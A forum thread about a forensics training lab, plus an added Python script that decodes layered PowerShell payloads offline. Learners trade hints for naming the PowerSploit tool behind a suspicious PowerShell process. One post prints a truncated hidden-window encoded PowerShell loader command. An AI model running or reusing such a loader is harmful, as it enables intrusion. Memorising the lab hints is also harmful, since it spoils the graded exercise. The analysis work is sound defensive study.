Practical Digital Forensics Scenario

Hi guys,
I’m struggling with this one.

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

I noted that the command was triggered with base64 encoding, so the answer should be (I assume) copied and pasted from the GitHub link provided, but I'm not able to progress at all.

Any hints?

The encoded command can be decoded to reveal the answer. It's the name of one of the techniques available on the webpage, starting with P.

I am also stuck here. Any guide, please?

Try this way: it performs network enumeration and exploitation.

I found the answer, but I need to validate it. Can someone explain how we arrive at both answers for the questions in the section?

Hi. I found the solution, but I just guessed it. I found the PowerShell command with the base64 and, when I decoded it, I finally found executable code but nothing about the module used.


That's the problem with some of the modules; I didn't like it. I completed the entire blue team course, so if you get stuck feel free to reach me via PM.

Hello. I need assistance, kindly. I have been stuck here for days: (Practical Digital Forensics Scenario)
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework) has been utilized within the process, and enter its name as your answer.

Please check all the answers provided in this thread; there are many hints.

I just finished this a while ago.
First, identify any PowerShell commands or scripts executed by the process with PID 6744 in the memory dump; you can use Volatility's windows.cmdline.

command -
python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744

It will show you a result something like this -

C:\Users\johndoe\Desktop\volatility3-develop>python vol.py -f …\memdump\PhysicalMemory.raw windows.cmdline.CmdLine | findstr 6744
6744 powershell.exe “PowerShell.exe” -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADIAZwBKAFUAQgBNAEcAYgBDAEQATgBHADcAWAAwAEQATQBiAHMAUwB5AEEAcwBkAGwANABVAGwAYwB1AEYASwBlAEsAMQBYAEEAYgBEAG0ALwBmAGYANQA1AGEAQgBkAEgAbwA2AFAAZABQAFMAegBFAFMASwBxAEgATABkADUAZABTADUAUwA5ADAANQA0AFgAZA

Second - this is base64; decode it using any tool like PowerShell, CyberChef or Burp Suite. Me, I asked ChatGPT to decode it for me, then I asked GPT to explain it, too.

Third - look for the result in the GitHub repo.

I have worked out that the result is Out-EncodedCommand, but I don't know why it's not accepting it. Any other hints?


It's simpler than this: just use the provided site with the Metasploit tools and try to find the adequate tool name that "performs network enumeration and exploitation".

This question isn’t ideal.

If any of you guys are banging your head on this one, it's not asking for Invoke-Shellcode or the like; it's asking for the tool.

This is the most frustrating task I have ever done. It looks like it's injecting shellcode into a process,
but that's not the answer.

And for all my efforts I can't find any other good ways of solving this one.
I have reversed all the encoded parts, to no effect.
It still is just not clear; I feel the question is messing it up for me.

It sounds like your search for the tools was simple, but it has been complicated for me.

I tried listing all the tools from the README.md, but none of them worked. Then I tried listing individual functions and modules, but there are lots of them in each file, so I tried lots but not all of them. Someone said the word Invoke was not in the name, so I tried function names eliminating Invoke from them, but to no luck.

How did you find this?

This one was tricky. I had to decode it from base64, and then there was a PowerShell script with another payload that furthermore was being decoded from base64 and uncompressed, per the code. I had to change the code to just save the uncompressed, double-decoded payload to a file instead of executing it, and then run the PowerShell script. Then the final payload was still not searchable in the GitHub repo, but I tried searching other random parts of the code until I found something promising. The name of the tool corresponds to the name of one of the PowerShell files, but without the .ps1 extension.
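The decoding procedure described in the Volatility walkthrough above and in the post just before this one (decode the -encodedcommand argument, find the nested FromBase64String blob, gunzip it, save the result to a file rather than executing it, then pull out function names to search the repository for) can be done offline without running any of the recovered script. The following is an added example that is not part of this thread or of PowerSploit; the sample command it decodes is constructed inside the script from a harmless placeholder (the memory dump, PID 6744 and the real payload from the thread are not used), and build_sample_encoded_command, decode_nested_layers and extract_identifiers are names chosen here.

```python
"""Defensive decoder for layered PowerShell -encodedcommand payloads.

Added example for the forum thread, not code from the thread or from
PowerSploit. Steps mirror what the posts describe:
  1. -encodedcommand is base64 of UTF-16LE text: decode it.
  2. The result contains [Convert]::FromBase64String("...") with a
     gzip-compressed inner script: base64-decode and gunzip it.
  3. Write the final plaintext to a file for inspection (never IEX it).
  4. List Verb-Noun identifiers to look up in the repository.
The sample input is CONSTRUCTED here from a harmless placeholder script.
"""
import base64
import gzip
import re
from pathlib import Path

GZIP_MAGIC = b"\x1f\x8b"
# Argument of FromBase64String("...") or FromBase64String('...')
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# PowerShell Verb-Noun identifiers such as Get-Something or Invoke-Thing
VERB_NOUN = re.compile(r"\b[A-Z][a-z]+-[A-Z][A-Za-z]+\b")


def _b64decode_lenient(b64: str) -> bytes:
    """Base64-decode, restoring '=' padding that extraction often drops."""
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def decode_encoded_command(b64: str) -> str:
    """Outer layer: the -encodedcommand value is base64 over UTF-16LE text."""
    return _b64decode_lenient(b64).decode("utf-16-le")


def decode_nested_layers(script: str, max_depth: int = 5) -> list:
    """Peel nested FromBase64String blobs, gunzipping where the gzip magic
    appears. Returns every layer, outermost first; nothing is executed."""
    layers = [script]
    current = script
    for _ in range(max_depth):
        match = NESTED_B64.search(current)
        if not match:
            break
        raw = _b64decode_lenient(match.group(1))
        if raw.startswith(GZIP_MAGIC):
            raw = gzip.decompress(raw)
        # ASCII text in UTF-16LE has a NUL in every second byte
        encoding = "utf-16-le" if len(raw) > 1 and raw[1:2] == b"\x00" else "utf-8"
        current = raw.decode(encoding, errors="replace")
        layers.append(current)
    return layers


def extract_identifiers(text: str) -> list:
    """Sorted unique Verb-Noun names to search for in the repository."""
    return sorted(set(VERB_NOUN.findall(text)))


def save_final_payload(layers: list, path: str) -> str:
    """Persist the innermost layer for manual review instead of running it."""
    Path(path).write_text(layers[-1], encoding="utf-8")
    return path


# --- constructed sample input (placeholder script, not the thread's payload) ---
SAMPLE_INNER = (
    "# constructed harmless sample\n"
    "function Get-SampleInfo { Write-Output 'Get-SampleInfo called' }\n"
    "Get-SampleInfo\n"
)


def build_sample_encoded_command(inner_script: str) -> str:
    """Wrap inner_script the way the thread's command is wrapped:
    gzip -> base64 -> MemoryStream/GzipStream loader stub -> UTF-16LE base64."""
    inner_b64 = base64.b64encode(gzip.compress(inner_script.encode("utf-8"), mtime=0)).decode()
    stub = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + inner_b64 + '"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    )
    return base64.b64encode(stub.encode("utf-16-le")).decode()


if __name__ == "__main__":
    encoded = build_sample_encoded_command(SAMPLE_INNER)
    layers = decode_nested_layers(decode_encoded_command(encoded))
    out = save_final_payload(layers, "decoded_payload.ps1")
    print(f"{len(layers)} layer(s) decoded, final layer saved to {out}")
    print("identifiers to search:", extract_identifiers(layers[-1]))
```

With a real command line, paste the value that follows -encodedcommand into decode_encoded_command and pass the result to decode_nested_layers; the thread's own blob begins "JABzAD0A", which decodes to "$s=", and the nested blob begins "H4sI", the base64 form of the gzip magic bytes, which is why the gunzip step is needed.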

The answer is just a tool name from the provided website; the name was nested somewhere in there.